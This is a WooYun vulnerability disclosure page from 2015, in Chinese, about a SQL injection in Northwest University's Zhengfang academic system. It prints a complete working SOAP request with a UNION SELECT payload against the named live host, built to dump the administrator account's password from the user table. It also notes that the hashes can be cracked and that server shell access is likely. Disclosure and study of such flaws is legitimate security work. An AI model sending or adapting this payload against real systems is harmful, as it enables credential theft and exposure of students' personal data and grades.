当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158946

漏洞标题:西北大学某系统漏洞#泄漏全校学生信息

相关厂商:nwu.edu.cn

漏洞作者: 路人甲

提交时间:2015-12-07 11:04

修复时间:2015-12-12 11:06

公开时间:2015-12-12 11:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-07: 细节已通知厂商并且等待厂商处理中
2015-12-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

如题

详细说明:

0x01 漏洞描述

西北大学教务管理系统,存在正方教务管理系统漏洞,可查看学生个人信息、成绩等信息


0x02 漏洞地址

http://jwxt.nwu.edu.cn/(scg2un45c3cxvxqp55sr2uim)/


0x03 漏洞类型

SQL注入


该漏洞属于正方教务系统漏洞,

存在于/service.asmx中,GetStuCheckinInfo方法,属于webservice的soap注入,可用union查询


0x04 漏洞测试方法
burp抓包,或者直接构造如下请求方式

POST /(xqnygirlq1fwg1reuekyrg45)/service.asmx HTTP/1.1
Host: jwxt.nwu.edu.cn
Content-Type: text/xml; charset=utf-8
Content-Length: 956
SOAPAction: "http://www.zf_webservice.com/GetStuCheckinInfo "
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://tempuri.org/" xmlns:types="http://tempuri.org/encodedTypes" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<q1:GetStuCheckinInfo xmlns:q1="http://www.zf_webservice.com/GetStuCheckinInfo">
<xh xsi:type="xsd:string">20121' union select Null,kl,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null from yhb where yhm='jwc01</xh>
<xnxq xsi:type="xsd:string">2014-2015-1</xnxq>
<strKey xsi:type="xsd:string">KKKGZ2312</strKey>
</q1:GetStuCheckinInfo>
</soap:Body>
</soap:Envelope>


即可以看出xsd:string为注入点,可爆出jwc01等等用户密码,用专门的解密工具解密即可

~]2M8KV6VS183JH1G75UD$B.png


漏洞证明:

0x05 危害描述
可获取全校学生信息,成绩等等
从这里可以获取学院全部信息

0N%5`_)5W{2XKCK2ZRCTS[D.png


获取个人信息

EO_R8Z{RZS$_%}L01%HN4E2.png


获取成绩信息

4]O[{RNY)LR2IINBG0GZL26.png


点到为止吧、不在深入了、应该是可以获取shell,取服务器权限的~~~

修复方案:

交给工作人员

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-12 11:06

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无